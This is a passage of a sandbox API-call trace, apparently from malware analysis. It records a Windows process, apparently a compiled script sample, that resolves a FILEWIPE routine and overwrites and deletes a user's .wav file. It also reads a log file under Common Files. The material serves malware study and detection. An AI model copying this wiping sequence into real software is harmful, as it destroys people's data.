wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.323] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.323] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0038.324] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.324] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.324] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0038.324] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0038.324] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0038.324] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0038.324] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.324] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.324] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.324] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.325] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.325] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0038.325] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.325] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.325] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3f4aa0, ftCreationTime.dwHighDateTime=0x1d5c100, ftLastAccessTime.dwLowDateTime=0x75c598c0, ftLastAccessTime.dwHighDateTime=0x1d5bc05, ftLastWriteTime.dwLowDateTime=0x75c598c0, ftLastWriteTime.dwHighDateTime=0x1d5bc05, nFileSizeHigh=0x0, nFileSizeLow=0x14996, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ohsKY-A9exL.wav", cAlternateFileName="OHSKY-~1.WAV")) returned 0x7c2100 [0038.326] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.326] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.326] CharLowerBuffW (in: lpsz="byte[84374]", cchLength=0xb | out: lpsz="byte[84374]") returned 0xb [0038.326] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.326] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.326] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.326] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.326] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.326] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.326] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0038.327] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.327] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.327] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.327] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.327] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.328] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.328] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ohsky-a9exl.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0038.329] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0038.329] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.329] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.329] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.329] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.329] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.329] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.330] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.330] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.330] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.330] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.330] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0038.330] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", lpFilePart=0x0) returned 0x33 [0038.331] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3f4aa0, ftCreationTime.dwHighDateTime=0x1d5c100, ftLastAccessTime.dwLowDateTime=0x75c598c0, ftLastAccessTime.dwHighDateTime=0x1d5bc05, ftLastWriteTime.dwLowDateTime=0x168d96e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14996, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ohsKY-A9exL.wav", cAlternateFileName="OHSKY-~1.WAV")) returned 0x7c2100 [0038.331] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ohsKY-A9exL.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ohsky-a9exl.wav")) returned 1 [0038.332] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f3f4aa0, ftCreationTime.dwHighDateTime=0x1d5c100, ftLastAccessTime.dwLowDateTime=0x75c598c0, ftLastAccessTime.dwHighDateTime=0x1d5bc05, ftLastWriteTime.dwLowDateTime=0x168d96e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14996, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ohsKY-A9exL.wav", cAlternateFileName="OHSKY-~1.WAV")) returned 0 [0038.332] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.332] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.332] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.332] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.333] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.333] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.333] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.333] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.333] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.333] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.333] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.333] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.334] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.334] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.334] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.334] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.334] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.334] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x251d, lpOverlapped=0x0) returned 1 [0038.334] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.334] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x251d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.334] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.334] WideCharToMultiByte (in: 